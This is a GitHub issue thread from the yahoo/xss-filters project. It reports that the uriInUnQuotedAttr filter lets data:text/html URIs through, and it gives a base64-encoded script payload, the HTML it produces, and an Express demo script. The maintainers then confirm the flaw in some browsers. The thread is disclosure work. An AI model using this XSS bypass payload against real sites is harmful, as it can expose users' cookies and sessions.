### ISSUE TITLE
Bypass uriInUnQuotedAttr using data: scheme.

### ISSUE THREAD

**Issue by smiegles** [yahoo/xss-filters#12]
`uriInUnQuotedAttr` will catch url's starting with `javascript` but it doesn't catch url's starting with `data:text/html` using FireFox this can bypass the filter.

**Preview**
```
http://127.0.0.1:3000/?url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
```
Will result in:
```
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+>data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+</a>
```

**Script I used**
```
var express = require('express');
var app = express();
var xssFilters = require('xss-filters');

app.get('/', function(req, res){
  var url = req.query.url;
  res.send("<a href=" + xssFilters.uriInUnQuotedAttr(url) + ">" + xssFilters.uriInHTMLData(url) + "</a>");
});

app.listen(3000); // <- this is not present at the readme, you might want to add it.
```

**Comment by adon-at-work** [comment]
Thanks for reporting. We're aware of this.

Using `data:text/html,<script>alert(document.domain)</script>` in `<a href="">`, `<(i)frame src="">`, etc, it is expected that script will execute but it's of a different origin than the included page. In particular, script injected through data protocol runs in an empty origin. Hence it's not CROSS-SITE scripting.

A reference can be found here: https://github.com/yahoo/xss-filters/blob/master/src/xss-filters.js#L247-L259

**Comment by smiegles** [comment]
I seriously doubt that, are you sure?

![screen shot 2015-03-21 at 13 44 35](https://cloud.githubusercontent.com/assets/3210641/6765075/89e5e506-cfd0-11e4-9a42-06f45601d13d.png)
![screen shot 2015-03-21 at 13 44 44](https://cloud.githubusercontent.com/assets/3210641/6765076/89ea6e82-cfd0-11e4-92d3-d336739d66a9.png)

**Comment by adon-at-work** [comment]
Yes, you're perfectly correct. :+1: 
It's a known issue to us that some browsers inherit the origin instead of setting it to be empty, unlike Chrome.  We're going to have an internal round of reviews for such kind of compatibility issues. I am going to expedite that with regard to your report. Thanks again. :)
